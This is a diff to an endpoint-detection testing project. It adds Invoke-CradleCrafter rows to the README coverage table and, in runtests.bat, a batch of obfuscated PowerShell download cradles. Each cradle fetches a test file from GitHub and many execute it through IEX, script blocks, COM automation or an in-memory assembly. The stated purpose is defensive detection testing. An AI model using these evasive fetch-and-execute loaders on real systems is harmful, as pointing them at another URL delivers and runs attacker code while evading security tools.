diff --git a/README.md b/README.md index 23580a7..6f5397c 100644 --- a/README.md +++ b/README.md @@ -24,25 +24,27 @@ The script executes only calc.exe through numerous methods. You can replace this **Coverage** -| ATT&CK | LOLBAS | -| ------------- | ------------- | -| T1197 | msiexec.exe | -| T1118 | diskshadow.exe | -| T1170 | esentutl.exe | -| T1086 | replace.exe | -| T1121 | SyncAppvPublishingServer | -| T1117 | hh.exe | -| T1127 | ieexec.exe | -| T1047 | Setupapi | -| T1128 | Shdocvw | -| T1085 | csc.exe | -| T1130 | advpack.dll | -| T1191 | Scriptrunner | -| T1202 | sc | -| T1028 | Register-cimprovider | -| T1053 | control.exe | -| T1216 | manage-bde.wsf | -| T1218 | +The following attacks are currently covered by this script: + +| ATT&CK | LOLBAS | Invoke-CradleCrafter | +| ------------- | ------------- | ------------- | +| T1197 | msiexec.exe | MEMORY\PSWEBSTRING | +| T1118 | diskshadow.exe | MEMORY\PSWEBDATA | +| T1170 | esentutl.exe | MEMORY\PSWEBOPENREAD | +| T1086 | replace.exe | MEMORY\NETWEBSTRING | +| T1121 | SyncAppvPublishingServer | MEMORY\NETWEBDATA | +| T1117 | hh.exe | MEMORY\NETWEBOPENREAD | +| T1127 | ieexec.exe | MEMORY\PSWEBREQUEST | +| T1047 | Setupapi | MEMORY\PSRESTMETHOD | +| T1128 | Shdocvw | MEMORY\NETWEBREQUEST | +| T1085 | csc.exe | MEMORY\PSSENDKEYS | +| T1130 | advpack.dll | MEMORY\PSCOMWORD | +| T1191 | Scriptrunner | MEMORY\PSCOMEXCEL | +| T1202 | sc | MEMORY\PSCOMIE | +| T1028 | Register-cimprovider | MEMORY\PSCOMMSXML | +| T1053 | control.exe | MEMORY\PSINLINECSHARP | +| T1216 | manage-bde.wsf | MEMORY\PSCOMPILEDCSHARP | +| T1218 | | MEMORY\CERTUTIL | | T1033 | | T1140 | | T1183 | diff --git a/runtests.bat b/runtests.bat index 65952ea..92271d8 100644 --- a/runtests.bat +++ b/runtests.bat 
@@ -448,6 +448,9 @@ start "" cmd /c control.exe AllTheThings.dll echo Execution Finished at %time% %date% echo Command Excuted: control.exe AllTheThings.dll + +timeout 5 + echo %time% %date% [+] Testing manage-bde.wsf exec set comspec=C:\windows\system32\calc.exe start "" cmd /c cscript C:\windows\system32\manage-bde.wsf 
@@ -457,6 +460,100 @@ echo Command Excuted: cscript C:\windows\system32\manage-bde.wsf REM Reset ComSpec set comspec=C:\WINDOWS\system32\cmd.exe + + +echo ********************************************** +echo * Testing Invoke-CradleCrafter PAYLOADS * +echo ********************************************** + +echo %time% %date% [+] Testing MEMORY\PSWEBSTRING exec +start "" cmd /c powershell -c "Set-Item Variable:\FW 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';dir ect*;SI Variable:/d (.(LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name).(((LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name).PsObject.Methods|Where{(ChildItem Variable:/_).Value.Name-ilike'*Co*d'}).Name).Invoke((LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name).(((LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name)|Get-Member|Where{(ChildItem Variable:/_).Value.Name-ilike'*man*Name'}).Name).Invoke('*w-*ct',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name).(((LS Variable:/E*tex*).Value.(((LS Variable:/E*tex*).Value|Get-Member)[6].Name)|Get-Member|Where{(ChildItem Variable:/_).Value.Name-ilike'I*t'}).Name).Invoke((Variable d -Va).((((Variable d -Va)|Get-Member)|Where{(ChildItem Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((Get-Item Variable:/FW).Value))" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSWEBDATA exec +start "" cmd /c powershell -c "dir ect*;SV j8 (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|?{$_.Name-like'*nd*e'}).Name).Invoke('Ne*ct',$TRUE,$TRUE))Net.WebClient);Set-Variable z 
'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';[ScriptBlock]::Create(([String]::Join('',(((Get-Variable j8 -ValueOn).((((Get-Variable j8 -ValueOn)|Member)|?{$_.Name-like'D*a'}).Name).Invoke((Variable z -ValueOnl))|%{$_-As'Char'}))))).Invoke()" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSWEBOPENREAD exec +start "" cmd /c powershell -c "$wr=(New-Object Net.WebClient);$url='https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';$sr=New-Object IO.StreamReader($wr.OpenRead($url));$res=$sr.ReadToEnd();$sr.Close();$res" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\NETWEBSTRING exec +start "" cmd /c powershell -c "([System.Net.WebClient]::New().DownloadString('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt'))" +echo Execution Finished at %time% %date% + +timeout 5 + +echo %time% %date% [+] Testing MEMORY\NETWEBDATA exec +start "" cmd /c powershell -c "Set-Variable Q 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';SI Variable:/V0r ([Net.WebClient]::New());SV MAI (((((GV V0r).Value|Member)|?{(ChildItem Variable:/_).Value.Name-like'*wn*a'}).Name));&([ScriptBlock]::Create(([System.String]::Join('',(((GV V0r).Value.((GI Variable:\MAI).Value)((GV Q).Value)|ForEach{(GI Variable:\_).Value-As'Char'}))))))" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\NETWEBOPENREAD exec +start "" cmd /c powershell -c "Set-Variable RsL ([Net.WebClient]::New());SV 7SW 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';Set-Variable RsL (LS Variable:RsL).Value.((((LS Variable:RsL).Value|Member)|Where-Object{(Variable _).Value.Name-ilike'*ad'}).Name)((Variable 7SW -Va));Set-Variable UR '';Try{While((Get-Item Variable:UR).Value+=[Char](LS 
Variable:RsL).Value.ReadByte()){}}Catch{};[ScriptBlock]::Create((Get-Item Variable:UR).Value).InvokeReturnAsIs()" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSWEBREQUEST exec +start "" cmd /c powershell -c "Set-Item Variable:/c 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';[ScriptBlock]::Create((((Get-Item Variable:c).Value|ForEach-Object{(.(Get-Variable E*tex*).Value.InvokeCommand.(((Get-Variable E*tex*).Value.InvokeCommand|Get-Member|Where{$_.Name-clike'*t*a*d'}).Name)((Get-Variable E*tex*).Value.InvokeCommand.(((Get-Variable E*tex*).Value.InvokeCommand.PsObject.Methods|Where{$_.Name-clike'*nd*e'}).Name)('In*k*t',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet) $_)})|ForEach-Object{$_.(($_|Get-Member)[4].Name).Invoke()})).Invoke()" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSRESTMETHOD exec +start "" cmd /c powershell -c "SI Variable:50a 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';Set-Variable Z ((Get-ChildItem Variable:50a).Value|ForEach-Object{(.$ExecutionContext.(($ExecutionContext|GM)[6].Name).GetCommand($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(Variable _ -Va).Name-like'*man*Name'}).Name)('*-Re*d',1,1),[Management.Automation.CommandTypes]::Cmdlet) (Variable _ -Va))});IEX (GV Z -ValueO)" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\NETWEBREQUEST exec +start "" cmd /c powershell -c "SI Variable:\UB ([Net.HttpWebRequest]::Create('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt').GetResponse().GetResponseStream());Set-Variable AZe '';Try{While((Variable AZe).Value+=[Char](Variable UB).Value.ReadByte()){}}Catch{};[ScriptBlock]::Create((Variable AZe).Value).Invoke()" +echo Execution Finished at 
%time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSSENDKEYS execs +start "" cmd /c powershell -c "ls _-*;Set-Item Variable:/O (&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('N*-O*',1,1))-ComObj WScript.Shell);Set-Item Variable:/l 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';Set-Variable fN 'HKCU:\Software\Microsoft\Notepad';SI Variable:\76 'Notepad';$Null=[System.Reflection.Assembly]::([System.Reflection.Assembly].GetMethods()|Where-Object{$_.Name-like'L*ame'}|ForEach{(LS Variable:\_).Value.Name}|Select -Firs 1).Invoke('System.Windows.Forms');Set-Variable 5M (&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')(Item Variable:\fN).Value);@(@(((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[14].Name),0),@(((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[8].Name),([String]([Windows.Forms.Screen]::AllScreens)).Split('=')[5].Split('}')[0]))|ForEach{&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('S*-Ite*y')(Item Variable:\fN).Value $_[0] (LS Variable:\_).Value[1]};SV yda (Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[2].Name).Invoke((Item Variable:76).Value).ProcessID;SI Variable:\J $Null;While(!((Get-Variable J).Value)){SI Variable:\J (Process|Where-Object{$_.id-ceq(ChildItem Variable:yda).Value}|ForEach{(LS 
Variable:\_).Value.MainWindowTitle});&($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*t-Sl*',1,$TRUE)))-Milli 500};While(!(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[0].Name).Invoke((Get-Variable J).Value)){&($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*t-Sl*',1,$TRUE)))-Milli 500};(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[10].Name).Invoke('^o');&($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*t-Sl*',1,$TRUE)))-Milli 500;@((Get-Variable l -ValueOnl),(' '*1000),'~')|ForEach{(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[10].Name).Invoke((LS Variable:\_).Value)};SI Variable:q $Null;While((Item Variable:\q).Value.Length -lt 2){[System.Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[10].Name).Invoke($_)};&($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*t-Sl*',1,$TRUE)))-Milli 500;SI Variable:q ([System.Windows.Forms.Clipboard]::([System.Windows.Forms.Clipboard].GetMethods()[16].Name).Invoke())};[System.Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[10].Name).Invoke((LS 
Variable:\_).Value)};If(Process|Where-Object{$_.id-ceq(ChildItem Variable:yda).Value}){@('{TAB}','~')|ForEach{(Get-Variable O -Val).(((Get-Variable O -Val)|Get-Member)[10].Name).Invoke($_)}};@(((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[7].Name),((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[14].Name),((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[6].Name),((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[8].Name),((&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('G*em*y')HKCU:\Software\Microsoft\Notepad|Get-Member)[5].Name))|ForEach{&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*lets'}).Name).Invoke('S*-Ite*y')(Item Variable:\fN).Value $_ (GCI Variable:5M).Value.((LS Variable:\_).Value)};(Item Variable:\q).Value|&$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'*m*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Get-Member|Where-Object{$_.Name-like'G*om*e'}).Name).Invoke('*e-*press*',1,1))" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSCOMWORD exec +start "" cmd /c powershell -c "gdr -*;Set-Item Variable:8 
(&$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member)[2].Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|?{$_.Name-like'*Com*e'}).Name).Invoke('*w-*ct',$TRUE,$TRUE))-C Word.Application);While((Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member|?{$_.Name-like'*sy'}).Name)){&($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|?{$_.Name-like'*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|?{$_.Name-like'*Com*e'}).Name).Invoke('*t-Sl*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet))-Mil 1000}(Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member)[420].Name)=(Get-Variable Fal* -Value);SV xz (Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member|?{$_.Name-like'D*cu*ts'}).Name).(((Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member|?{$_.Name-like'D*cu*ts'}).Name).PsObject.Members|?{$_.Name-like'O*n'}).Name).Invoke('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt');While((Get-Variable 8 -ValueOn).(((Get-Variable 8 -ValueOn)|Member|?{$_.Name-like'*sy'}).Name)){&($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|?{$_.Name-like'*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|?{$_.Name-like'*Com*e'}).Name).Invoke('*t-Sl*',1,$TRUE),[Management.Automation.CommandTypes]::Cmdlet))-Mil 1000}(ChildItem Variable:/xz).Value.(((ChildItem Variable:/xz).Value|Member)[205].Name).(((ChildItem Variable:/xz).Value.(((ChildItem Variable:/xz).Value|Member)[205].Name)|Member)[172].Name)|.(COMMAND *-Ex*n);(Get-Variable 8 
-ValueOn).Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject((Get-Variable 8 -ValueOn))" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSCOMEXCEL exec +start "" cmd /c powershell -c "$comExcel=New-Object -ComObject Excel.Application;While($comExcel.Busy){Start-Sleep -Seconds 1}$comExcel.DisplayAlerts=$False;$Null=$comExcel.Workbooks.Open('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt');While($comExcel.Busy){Start-Sleep -Seconds 1}(($comExcel.Sheets.Item(1).Range(\"A1:Q\"+$comExcel.Sheets.Item(1).UsedRange.Rows.Count).Value2|?{(LS Variable:_).Value})-Join\"`n\");$comExcel.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comExcel)" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSCOMIE exec +start "" cmd /c powershell -c "popd;Set-Variable 9Z (&$ExecutionContext.(($ExecutionContext|GM)[6].Name).GetCommand($ExecutionContext.(($ExecutionContext|GM)[6].Name).GetCommandName('Ne*ct',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)-Co InternetExplorer.Application -Pro @{Silent=(Get-Variable Tr*).Value;Visible=(Get-ChildItem Variable:/Fal*).Value;Navigate='https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt'});While((Variable 9Z -Val).(((Variable 9Z -Val)|GM|Where{$_.Name-ilike'Bu*y'}).Name)){&($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where{$_.Name-ilike'*m*ts'}).Name).Invoke('*t-S*p'))1}IEX (Variable 9Z -Val).(((Variable 9Z -Val)|GM|Where{$_.Name-ilike'*ment'}).Name).(((Variable 9Z -Val).(((Variable 9Z -Val)|GM|Where{$_.Name-ilike'*ment'}).Name)|GM|Where{$_.Name-ilike'b*y'}).Name).(((Variable 9Z -Val).(((Variable 9Z -Val)|GM|Where{$_.Name-ilike'*ment'}).Name).(((Variable 9Z -Val).(((Variable 9Z 
-Val)|GM|Where{$_.Name-ilike'*ment'}).Name)|GM|Where{$_.Name-ilike'b*y'}).Name)|GM|Where{$_.Name-ilike'o*Text'}).Name);(Variable 9Z -Val).Quit();[Void][Runtime.InteropServices.Marshal]::ReleaseComObject((Variable 9Z -Val))" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSCOMMSXML exec +start "" cmd /c powershell -c "ls _-*;SI Variable:/2 (&(Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).(((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name)|GM|Where{(DIR Variable:/_).Value.Name-like'*and'}).Name).Invoke((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).(((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).PsObject.Methods|Where{(DIR Variable:/_).Value.Name-like'*man*Name'}).Name).Invoke('N*-O*',1,1),[Management.Automation.CommandTypes]::Cmdlet)-ComOb MsXml2.ServerXmlHttp);(ChildItem Variable:\2).Value.(((ChildItem Variable:\2).Value|GM)[4].Name)('GET','https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt',(Get-ChildItem Variable:F*a*e).Value);(ChildItem Variable:\2).Value.(((ChildItem Variable:\2).Value|GM)[5].Name)();&(Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).(((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name)|GM|Where{(DIR Variable:/_).Value.Name-like'*let'}).Name).Invoke((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).(((Get-Variable E*ext -ValueO).(((Get-Variable E*ext -ValueO)|GM)[6].Name).PsObject.Methods|Where{(DIR Variable:/_).Value.Name-like'*man*Name'}).Name).Invoke('I*e-E*',1,$TRUE))(ChildItem Variable:\2).Value.(((ChildItem Variable:\2).Value|GM)[16].Name)" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSINLINECSHARP exec +start "" cmd /c powershell -c "SI Variable:\x 'public class Xlqndampcv{public static string IGJnkoBiM(string url){return (new 
System.Net.WebClient()).DownloadString(url);}}';dir ty*;.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where{$_.Name-ilike'*ts'}).Name).Invoke('A*-T*p*e')-Lang CSharp (Variable x).Value;Set-Item Variable:\0 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';.(GAL I*X)(([Xlqndampcv]::IGJnkoBiM((ChildItem Variable:0).Value)))" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing MEMORY\PSCOMPILEDCSHARP exec +start "" cmd /c powershell -c "[Void][System.Reflection.Assembly]::Load([Byte[]](@(77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+@(0)*7+@(80,69,0,0,76,1,3,0,126,189,77,91)+@(0)*8+@(224,0,2,33,11,1,11,0,0,4,0,0,0,6,0,0,0,0,0,0,110,35,0,0,0,32,0,0,0,64,0,0,0,0,0,16,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)+@(0)*8+@(128,0,0,0,2,0,0,0,0,0,0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(32,35,0,0,75,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,0,0,8)+@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,116,3,0,0,0,32,0,0,0,4,0,0,0,2)+@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46,114,101,108,111,99,0,0,12,0,0,0,0,96,0,0,0,2,0,0,0,10)+@(0)*14+@(64,0,0,66)+@(0)*16+@(80,35,0,0,0,0,0,0,72,0,0,0,2,0,5,0,120,32,0,0,168,2,0,0,1)+@(0)*55+@(19,48,2,0,17,0,0,0,1,0,0,17,0,115,3,0,0,10,2,40,4,0,0,10,10,43,0,6,42,30,2,40,5,0,0,10,42,0,0,0,66,83,74,66,1,0,1,0,0,0,0,0,12,0,0,0,118,52,46,48,46,51,48,51,49,57,0,0,0,0,5,0,108,0,0,0,12,1,0,0,35,126,0,0,120,1,0,0,204,0,0,0,35,83,116,114,105,110,103,115,0,0,0,0,68,2,0,0,8,0,0,0,35,85,83,0,76,2,0,0,16,0,0,0,35,71,85,73,68,0,0,0,92,2,0,0,76,0,0,0,35,66,108,111,98)+@(0)*7+@(2,0,0,1,71,21,2,0,9,0,0,0,0,250,37,51,0,22,0,0,1,0,0,0,
4,0,0,0,2,0,0,0,2,0,0,0,1,0,0,0,5,0,0,0,2,0,0,0,1,0,0,0,1,0,0,0,2,0,0,0,0,0,10,0,1,0,0,0,0,0,6,0,43,0,36,0,6,0,99,0,67,0,6,0,131,0,67,0,10,0,179,0,168,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,16,0,21,0,0,0,5,0,1,0,1,0,80,32,0,0,0,0,150,0,50,0,10,0,1,0,109,32,0,0,0,0,134,24,57,0,15,0,2,0,0,0,1,0,63,0,17,0,57,0,19,0,25,0,57,0,15,0,33,0,57,0,15,0,33,0,189,0,24,0,9,0,57,0,15,0,46,0,11,0,33,0,46,0,19,0,42,0,29,0,4,128)+@(0)*16+@(161,0,0,0,4)+@(0)*11+@(1,0,27,0,0,0,0,0,4)+@(0)*11+@(1,0,36)+@(0)*8+@(60,77,111,100,117,108,101,62,0,99,114,97,100,108,101,46,100,108,108,0,67,108,97,115,115,0,109,115,99,111,114,108,105,98,0,83,121,115,116,101,109,0,79,98,106,101,99,116,0,77,101,116,104,111,100,0,46,99,116,111,114,0,117,114,108,0,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,67,111,109,112,105,108,101,114,83,101,114,118,105,99,101,115,0,67,111,109,112,105,108,97,116,105,111,110,82,101,108,97,120,97,116,105,111,110,115,65,116,116,114,105,98,117,116,101,0,82,117,110,116,105,109,101,67,111,109,112,97,116,105,98,105,108,105,116,121,65,116,116,114,105,98,117,116,101,0,99,114,97,100,108,101,0,83,121,115,116,101,109,46,78,101,116,0,87,101,98,67,108,105,101,110,116,0,68,111,119,110,108,111,97,100,83,116,114,105,110,103,0,0,3,32,0,0,0,0,0,103,95,116,171,97,113,148,66,141,34,197,250,155,72,85,140,0,8,183,122,92,86,25,52,224,137,4,0,1,14,14,3,32,0,1,4,32,1,1,8,4,32,1,14,14,3,7,1,14,8,1,0,8,0,0,0,0,0,30,1,0,1,0,84,2,22,87,114,97,112,78,111,110,69,120,99,101,112,116,105,111,110,84,104,114,111,119,115,1,0,0,0,72,35)+@(0)*8+@(0,0,94,35,0,0,0,32)+@(0)*22+@(80,35)+@(0)*8+@(95,67,111,114,68,108,108,77,97,105,110,0,109,115,99,111,114,101,101,46,100,108,108,0,0,0,0,0,255,37,0,32,0,16)+@(0)*154+@(1,0,16,0,0,0,24,0,0,128)+@(0)*14+@(1,0,1,0,0,0,48,0,0,128)+@(0)*14+@(1,0,0,0,0,0,72,0,0,0,88,64,0,0,68,2)+@(0)*8+@(0,0,68,2,52,0,0,0,86,0,83,0,95,0,86,0,69,0,82,0,83,0,73,0,79,0,78,0,95,0,73,0,78,0,70,0,79,0,0,0,0,0,189,4,239,254,0,0,1)+@(0)*16+@(0,63)+@(0)*7+@(4,0,0,0,2)+@(0)*14+@(0,68,0,0,0,1,0,86,0,97
,0,114,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0,0,0,0,0,36,0,4,0,0,0,84,0,114,0,97,0,110,0,115,0,108,0,97,0,116,0,105,0,111,0,110)+@(0)*7+@(176,4,164,1,0,0,1,0,83,0,116,0,114,0,105,0,110,0,103,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0,0,0,128,1,0,0,1,0,48,0,48,0,48,0,48,0,48,0,52,0,98,0,48,0,0,0,44,0,2,0,1,0,70,0,105,0,108,0,101,0,68,0,101,0,115,0,99,0,114,0,105,0,112,0,116,0,105,0,111,0,110,0,0,0,0,0,32,0,0,0,48,0,8,0,1,0,70,0,105,0,108,0,101,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56,0,11,0,1,0,73,0,110,0,116,0,101,0,114,0,110,0,97,0,108,0,78,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,40,0,2,0,1,0,76,0,101,0,103,0,97,0,108,0,67,0,111,0,112,0,121,0,114,0,105,0,103,0,104,0,116,0,0,0,32,0,0,0,64,0,11,0,1,0,79,0,114,0,105,0,103,0,105,0,110,0,97,0,108,0,70,0,105,0,108,0,101,0,110,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,52,0,8,0,1,0,80,0,114,0,111,0,100,0,117,0,99,0,116,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56,0,8,0,1,0,65,0,115,0,115,0,101,0,109,0,98,0,108,0,121,0,32,0,86,0,101,0,114,0,115,0,105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48)+@(0)*360+@(32,0,0,12,0,0,0,112,51)+@(0)*502));([Class]::Method('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt'))" +echo Execution Finished at %time% %date% +timeout 5 + +echo %time% %date% [+] Testing 